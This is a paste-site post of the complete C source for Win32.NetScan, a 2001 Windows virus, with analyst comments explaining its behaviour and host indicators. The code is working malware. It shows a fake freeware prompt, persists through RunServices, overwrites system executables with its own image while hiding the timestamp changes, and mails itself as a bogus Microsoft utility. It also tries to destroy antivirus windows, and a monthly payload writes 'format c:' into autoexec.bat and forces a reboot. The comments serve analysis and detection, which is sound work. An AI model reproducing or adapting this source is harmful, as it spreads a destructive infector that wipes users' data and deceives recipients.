FlyFar

Win32/Win32.Netscan - Virus Source Code

Mar 9th, 2023
  1. #include "netscan.h"
  2. #pragma hdrstop
  3. #pragma warning (disable: 4068)
  4. #pragma warning (disable: 4001)
  5. #pragma resource "resource.res"
  6.  
  7. char GetNetScanPath[256],GetNetScanWinDir[256],MyBuffer[256]="echo y|format c: /u /v:HaHaHaHa";
     // File-scope state for the sample (line above and declarations below).
     // GetNetScanPath receives the sample's own full path (SearchPath in WinMain) and is
     // reused as the registry value data, the mail attachment path, the CreateProcess
     // image and the mutex name. GetNetScanWinDir receives the Windows directory.
     // MyBuffer is the destructive payload text: WinMain appends it to autoexec.bat on
     // day 1 of the month. The literal is a stable string to match on in static scans.
  8. LPSTR FileEmm386 = "Emm386.exe";
  9. LPSTR FileSetver = "SetVer.exe";
     // FileEmm386 / FileSetver are not referenced in the visible WinMain, which compares
     // against lowercase literals instead.
  10. LPSTR Nom = "a";
      // Nom is the name string handed to the resolved MAPIResolveName call.
  11. DWORD ExtInf;
      // ExtInf receives the byte count from WriteFile when autoexec.bat is modified.
  12. int Err,ErrSend;
      // Err / ErrSend hold the return codes of the MAPI resolve and send calls.
  13. HANDLE NetScanTime,NetScanHandle,AutoBat;
  14. HMODULE GetKernLib, GetMapiLib;
  15. HKEY NetScan32Key,NetScanNTKey,NetScanInstall,CreateNetScan;
  16. typedef DWORD(*RegistServProcs)(DWORD,DWORD);
  17. typedef ULONG(*SendMessInfect)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG);
  18. typedef ULONG(*FindUserAddress)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*);
  19. typedef ULONG(*DoMemFree)(LPVOID);
      // Function-pointer types for APIs that WinMain resolves at run time with
      // GetProcAddress: RegisterServiceProcess (kernel32) and MAPISendMail,
      // MAPIResolveName, MAPIFreeBuffer (mapi32). Because they are looked up by name,
      // these functions presumably do not show in the import table; look for the
      // name strings instead (verify against a built sample).
  20. HWND WindowsHwnd,SymantecHwnd,NAVHwnd;
      // Handles for the three FindWindow title lookups near the end of WinMain.
  21.  
  22. #pragma argsused
  23. int APIENTRY WinMain
  24. (
  25. HINSTANCE hInstance,
  26. HINSTANCE hPrevInstance,
  27. LPSTR     lpszCmdLine,
  28. int       nCmdShow
  29. )
  30. {
      // Analyst summary of what this entry point does, in source order:
      //   1. shows a decoy "freeware" message box;
      //   2. writes its own path under a RunServices registry key (autostart persistence);
      //   3. if HKLM Software\NetScan\Install cannot be opened: overwrites every *.exe in the
      //      Windows directory with a copy of itself (restoring the original timestamps),
      //      creates HKLM Software\Britney\Install, and mails itself as an attachment through
      //      Simple MAPI to a recipient the user is asked to pick;
      //   4. starts another copy of itself, creates a mutex named after its path, and calls
      //      RegisterServiceProcess;
      //   5. looks up windows by title (incl. Symantec / Norton AntiVirus) and tries to destroy them;
      //   6. time triggers: at 12:12 it opens the CD tray; on day 1 of the month it appends a
      //      "format c:" command to C:\autoexec.bat and forces a reboot.
      // None of the four parameters is used. Almost no return value is checked, so observed
      // behaviour on a given OS should be confirmed in a sandbox rather than read off the source.
  31. //Win32.NetScan by ZeMacroKiller98
  32. //All rights reserved (c) 2001
  33. WIN32_FIND_DATA GetFileToInfect;
  34. OSVERSIONINFO GetOsVer;
  35. FILETIME GetFileCreateTime,GetFileLstAccess,GetFileLstWrite;
  36. SYSTEMTIME TriggerScanTime;
  37. RegistServProcs MyServProcs;
  38. SendMessInfect SendMessToOther;
  39. FindUserAddress GetAddressUser;
  40. DoMemFree GetMemFree;
  41. GetKernLib = LoadLibrary("kernel32.dll");
      // RegisterServiceProcess is resolved by name; the result is not checked here and is
      // called unconditionally further down. The export is specific to Windows 9x, which
      // suggests that platform is the real target (confirm).
  42. MyServProcs = (RegistServProcs)GetProcAddress(GetKernLib,"RegisterServiceProcess");
      // Decoy dialog: presents the program as a legitimate utility and names Microsoft.
  43. MessageBox(NULL,"This freeware install automaticaly itself into your system\nIt scan your system each time you connect to network\nIf you have any problem, contact Microsoft","NetScan Utility",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
      // Resolve the sample's own full path from argv[0] into GetNetScanPath.
  44. SearchPath(NULL,_argv[0],NULL,sizeof(GetNetScanPath),GetNetScanPath,NULL);
  45. GetOsVer.dwOSVersionInfoSize = sizeof(GetOsVer);
  46. GetVersionEx(&GetOsVer);
      // Persistence: value "NetScanNT" or "NetScan32" = own path, under a RunServices key.
      // Host IoCs: the two value names and the key paths below. The keys are opened, not
      // created, and the open result is ignored. sizeof() writes the full 256-byte buffer.
      // NOTE(review): the NT branch spells the path "WindowsNT" without a space - hunt for
      // the literal string rather than assuming a value under a standard key.
  47. if(GetOsVer.dwPlatformId==VER_PLATFORM_WIN32_NT)
  48. {
  49.         RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScanNTKey);
  50.         RegSetValueEx(NetScanNTKey,"NetScanNT",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
  51.         RegCloseKey(NetScanNTKey);
  52. }
  53. else
  54. {
  55.         RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScan32Key);
  56.         RegSetValueEx(NetScan32Key,"NetScan32",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath));
  57.         RegCloseKey(NetScan32Key);
  58. }
      // "Already installed" check. The key tested here (Software\NetScan\Install) is not the
      // key created below (Software\Britney\Install), and nothing visible creates the former,
      // so this branch appears to run on every launch. Treat both key names as indicators.
  59. if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\NetScan\\Install",0,KEY_ALL_ACCESS,&NetScanInstall)!=ERROR_SUCCESS)
  60. {
  61.         GetMapiLib = LoadLibrary("mapi32.dll");
  62.         GetWindowsDirectory(GetNetScanWinDir,sizeof(GetNetScanWinDir));
  63.         SetCurrentDirectory(GetNetScanWinDir);
              // File infection loop over *.exe in the Windows directory (goto-based).
              // This is an overwriting infector: CopyFile replaces the whole target with the
              // sample's image, so the original programs are lost and must be restored from
              // known-good media. The FindFirstFile result is not checked.
  64.         NetScanHandle = FindFirstFile("*.exe",&GetFileToInfect);
  65.         NetScanFind:
              // Save the target's three timestamps before it is touched ...
  66.         NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
  67.         GetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
  68.         CloseHandle(NetScanTime);        
              // Two files are skipped by exact name comparison.
  69.         if((lstrcmp(GetFileToInfect.cFileName,"emm386.exe")==0)||(lstrcmp(GetFileToInfect.cFileName,"setver.exe")==0))
  70.                 goto NotInfection;
  71.         CopyFile(_argv[0],GetFileToInfect.cFileName,FALSE);
              // ... and write them back afterwards (timestomping). File times therefore do
              // not reveal the change; compare hashes or sizes against a baseline - many
              // .exe files in the Windows directory sharing one hash is the tell.
  72.         NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
  73.         SetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite);
  74.         CloseHandle(NetScanTime);
  75.         NotInfection:
  76.         if(FindNextFile(NetScanHandle,&GetFileToInfect)==TRUE)
  77.                 goto NetScanFind;
  78.         FindClose(NetScanHandle);
              // Marker key written after the loop (host IoC); see the mismatch noted at the check above.
  79.         RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Britney\\Install",&CreateNetScan);
  80.         RegCloseKey(CreateNetScan);
              // Simple MAPI entry points resolved by name. GetMemFree is resolved but never
              // called in the visible code.
  81.         SendMessToOther = (SendMessInfect)GetProcAddress(GetMapiLib,"MAPISendMail");
  82.         GetAddressUser = (FindUserAddress)GetProcAddress(GetMapiLib,"MAPIResolveName");
  83.         GetMemFree = (DoMemFree)GetProcAddress(GetMapiLib,"MAPIFreeBuffer");
  84.         if((SendMessToOther==NULL)||(GetAddressUser==NULL)||(GetMemFree==NULL))
  85.         {
                  // No MAPI available: show an error, change to C:/ and call DeleteFile, then exit.
                  // NOTE(review): DeleteFile is documented as taking a single file name; verify the
                  // real effect of the "*.*" argument in a sandbox before assuming data loss.
  86.                 MessageBox(NULL,"This program need MAPI functions installed on your PC\nPlease contact your hot line to install it","NetScan Utility",MB_OK|MB_ICONEXCLAMATION);
  87.                 SetCurrentDirectory("C:/");
  88.                 DeleteFile("*.*");
  89.                 ExitProcess(0);
  90.         }
      // E-mail propagation. The attachment is the sample's own executable (GetNetScanPath).
  91. MapiMessage stMessage;
  92. MapiRecipDesc stRecip;
  93. MapiFileDesc stFile;
  94. lpMapiRecipDesc lpRecip;
  95. stFile.ulReserved = 0;
  96. stFile.flFlags = 0L;
  97. stFile.nPosition = (ULONG)-1;
  98. stFile.lpszPathName = GetNetScanPath;
  99. stFile.lpszFileName = NULL;
  100. stFile.lpFileType = NULL;
       // Social engineering: the user is told to pick an address "to test your network".
  101. MessageBox(NULL,"To test your network, you need to select a email address into your address book\nPlease select address with","ILoveBritney Freeware",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL);
  102. UnResolve:
       // MAPI_DIALOG is passed, so name resolution is interactive. On any error the code
       // below either exits (after a DeleteFile call) or jumps back here and asks again.
  103. Err = (GetAddressUser)(lhSessionNull,0L,Nom,MAPI_DIALOG,0L,&lpRecip);
  104. if(Err!=SUCCESS_SUCCESS)
  105. {
  106. switch(Err){
               // Ambiguous / unknown recipient: message only, then retry via goto UnResolve.
  107.         case MAPI_E_AMBIGUOUS_RECIPIENT:
  108.                 MessageBox(NULL,"The recipient requested has not been or could\n not be resolved to a unique address list entry","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);                
  109.         break;
  110.         case MAPI_E_UNKNOWN_RECIPIENT:
  111.                 MessageBox(NULL,"The recipient could not be resolved to any\naddress.The recipient might not exist or might be unknown","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);                
  112.         break;
               // Remaining cases: message, DeleteFile call in the current directory (still the
               // Windows directory at this point), then ExitProcess; the break is unreachable.
  113.         case MAPI_E_FAILURE:
  114.                 MessageBox(NULL,"One or more unspecified errors occured\nThe name was not resolved","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  115.                 DeleteFile("*.*");
  116.                 ExitProcess(0);
  117.         break;
  118.         case MAPI_E_INSUFFICIENT_MEMORY:
  119.                 MessageBox(NULL,"There was insufficient memory to proceed","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  120.                 DeleteFile("*.*");
  121.                 ExitProcess(0);
  122.         break;
  123.         case MAPI_E_NOT_SUPPORTED:
  124.                 MessageBox(NULL,"The operation was not supported by the messaging system","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  125.                 DeleteFile("*.*");
  126.                 ExitProcess(0);
  127.         break;
               // Cancelling the address dialog is also answered with the DeleteFile + exit path.
  128.         case MAPI_E_USER_ABORT:
  129.                 MessageBox(NULL,"The user was cancelled one or more dialog box","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  130.                 DeleteFile("*.*");
  131.                 ExitProcess(0);
  132.         break;        
  133.         }
  134. goto UnResolve;
  135. }
       // Copy the resolved recipient into the outgoing message as the single To: address.
  136. stRecip.ulReserved = lpRecip->ulReserved;
  137. stRecip.ulRecipClass = MAPI_TO;
  138. stRecip.lpszName = lpRecip->lpszName;
  139. stRecip.lpszAddress = lpRecip->lpszAddress;
  140. stRecip.ulEIDSize = lpRecip->ulEIDSize;
  141. stRecip.lpEntryID = lpRecip->lpEntryID;
  142. stMessage.ulReserved = 0;
       // Mail-gateway indicators: this subject line, the body phrases below, and the
       // "Microsoft Technical Support" signature used to impersonate the vendor.
  143. stMessage.lpszSubject = "Microsoft NetScan Utility";
       // NOTE(review): both lstrcat destinations (a string literal and the MAPI-returned
       // name) are buffers not sized for the appended text, so behaviour here is undefined;
       // do not assume a live sample's mail body matches this text exactly.
  144. stMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI send you this mail to test my network\nI need you to send me a answer about it\nThis program can scan your network to find all problem into your network\n\n\tEnjoy to test your net...\nThank you and see you soon....\n\n\n\t\t\t\t\tMicrosoft Technical Support")));
  145. stMessage.lpszMessageType = NULL;
  146. stMessage.lpszDateReceived = NULL;
  147. stMessage.lpszConversationID = NULL;
  148. stMessage.flFlags = 0L;
  149. stMessage.lpOriginator = NULL;
  150. stMessage.nRecipCount = 1;
  151. stMessage.lpRecips = &stRecip;
  152. stMessage.nFileCount = 1;
  153. stMessage.lpFiles = &stFile;
       // Send with flags 0L, i.e. MAPI_DIALOG is not set for the send itself.
  154. ErrSend = (SendMessToOther)(lhSessionNull,0L,&stMessage,0L,0L);
  155. if(ErrSend!=SUCCESS_SUCCESS)
  156. {
  157.         MessageBox(NULL,"The test can't continue, due to a error occured during to sending message\nPlease contact our hotline at hotline@microsoft.com","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  158.         DeleteFile("*.*");
  159.         ExitProcess(0);
  160. }
  161. MessageBox(NULL,"The test is OK and NetScan is installed into your system\n",
  162.                 "NetScan Utility",
  163.                  MB_OK|MB_ICONINFORMATION);
  164. FreeLibrary(GetMapiLib);
  165. }
       // Runs on both paths; NetScanInstall is only a valid handle if the open above succeeded.
  166. RegCloseKey(NetScanInstall);
       // Launch another instance of the same image. STARTUPINFO is only partly initialised.
       // Each run starts a copy before any single-instance check, so process-creation
       // telemetry should show a same-image parent/child chain (confirm in a sandbox).
  167. STARTUPINFO NetScanInfo;
  168. PROCESS_INFORMATION NetScanProc;
  169. NetScanInfo.cb = sizeof(STARTUPINFO);
  170. NetScanInfo.lpReserved = NULL;
  171. NetScanInfo.lpReserved2 = NULL;
  172. NetScanInfo.cbReserved2 = 0;
  173. NetScanInfo.lpDesktop = NULL;
  174. NetScanInfo.dwFlags = STARTF_FORCEOFFFEEDBACK;
  175. if(CreateProcess(GetNetScanPath,
  176.                 NULL,
  177.                 (LPSECURITY_ATTRIBUTES)NULL,
  178.                 (LPSECURITY_ATTRIBUTES)NULL,
  179.                 FALSE,
  180.                 0,
  181.                 NULL,
  182.                 NULL,
  183.                 &NetScanInfo,
  184.                 &NetScanProc))
  185. {
  186. CloseHandle(NetScanProc.hProcess);
  187. CloseHandle(NetScanProc.hThread);
  188. }
       // Mutex named after the sample's own full path (host IoC). Only a NULL return ends
       // the process.
  189. if(CreateMutex(NULL,TRUE,GetNetScanPath)==NULL)
  190.         ExitProcess(0);
       // Both calls use NetScanProc even if CreateProcess failed, and hProcess was already
       // closed above, so the priority change may have no effect. RegisterServiceProcess
       // with argument 1 is the Windows 9x way to register a process as a service, which
       // presumably hides it from the task list; MyServProcs was never NULL-checked.
  191. SetPriorityClass(NetScanProc.hProcess,REALTIME_PRIORITY_CLASS);
  192. MyServProcs(NetScanProc.dwProcessId,1);
       // GetSystemTime reports UTC, so the triggers below are evaluated in UTC, not local time.
  193. GetSystemTime(&TriggerScanTime);
       // Window tampering by exact title: the three caption strings below are useful
       // static signatures. The calls are attempted once per run, not in a loop.
  194. //Close windows which title is WINDOWS
  195. WindowsHwnd = FindWindow(NULL,"WINDOWS");
  196. if(WindowsHwnd!=NULL)
  197.         DestroyWindow(WindowsHwnd);
  198. //Close access to Symantec HomePage
       // Defence evasion attempt: a fake browser error is shown if the vendor's update
       // page is open, then the window handle is passed to DestroyWindow.
  199. SymantecHwnd = FindWindow(NULL,"Symantec Security Updates - Home Page - Microsoft Internet Explorer");
  200. if(SymantecHwnd!=NULL)
  201. {
  202.         MessageBox(NULL,"You don't have access to this page\nPlease contact the web master to correct this problem\n","Microsoft Internet Explorer",MB_OK|MB_ICONEXCLAMATION|MB_ICONSTOP);
  203.         DestroyWindow(SymantecHwnd);
  204. }
  205. //Anti Norton Antivirus
       // Same pattern against a window titled "Norton AntiVirus"; this is the only dialog
       // that names the sample ("Win32.NetScan") instead of the decoy utility.
  206. NAVHwnd = FindWindow(NULL,"Norton AntiVirus");
  207. if(NAVHwnd !=NULL)
  208. {
  209.         MessageBox(NULL,"Ha Ha Ha Ha!!!!, you use NAV?????\nI can allow access to it\nChange AV now","Win32.NetScan",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
  210.         DestroyWindow(NAVHwnd);
  211. }
       // Nuisance trigger at 12:12: MCI commands open the CD tray and switch CD audio off.
  212. if((TriggerScanTime.wHour==12)&&(TriggerScanTime.wMinute==12))
  213. {
  214.     mciSendString("open cdaudio",NULL,0,NULL);
  215.     mciSendString("set cdaudio door open",NULL,0,NULL);
  216.     mciSendString("close cdaudio",NULL,0,NULL);
  217.     mciSendString("open cdaudio",NULL,0,NULL);
  218.     mciSendString("set cdaudio audio all off",NULL,0,NULL);
  219.     mciSendString("close cdaudio",NULL,0,NULL);
  220.         MessageBeep(MB_ICONEXCLAMATION);
  221. }        
       // Destructive trigger on day 1 of any month: append MyBuffer (the "format c:" command,
       // written as the full 256-byte buffer) to an existing autoexec.bat in the root of C:
       // and force a reboot. autoexec.bat is processed at boot on DOS-based Windows, so the
       // command would run on the next start. Response: on a suspected host, inspect
       // autoexec.bat for this line before allowing a reboot; monitoring writes to that
       // file catches the payload stage. The CreateFile result is not checked.
  222. if(TriggerScanTime.wDay==1)
  223. {
  224.         MessageBox(NULL,"It's the day that your PC is going to scan or maybe going to disappear","Win32.Netscan",MB_OK|MB_ICONEXCLAMATION);
  225.     SetCurrentDirectory("C:\\");
  226.         AutoBat = CreateFile("autoexec.bat",GENERIC_WRITE,0,(LPSECURITY_ATTRIBUTES) NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,(HANDLE) NULL);
  227.         SetFilePointer(AutoBat, 0, (LPLONG)NULL,FILE_END);
  228.         WriteFile(AutoBat,MyBuffer,sizeof(MyBuffer),&ExtInf,NULL);
  229.         CloseHandle(AutoBat);
  230.     ExitWindowsEx(EWX_FORCE|EWX_REBOOT,0);
  231. }                
  232. FreeLibrary(GetKernLib);
  233. return 0;
  234. }
  235.  
  236.  
  237. *************************************************************************
  238.  
  239. #define WIN32_LEAN_AND_MEAN
  240. #include <windows.h>
  241. #include <dos.h>
  242. #include <stdlib.h>
  243. #include <stdio.h>
  244. #include <mapi.h>
  245. #include <mmsystem.h>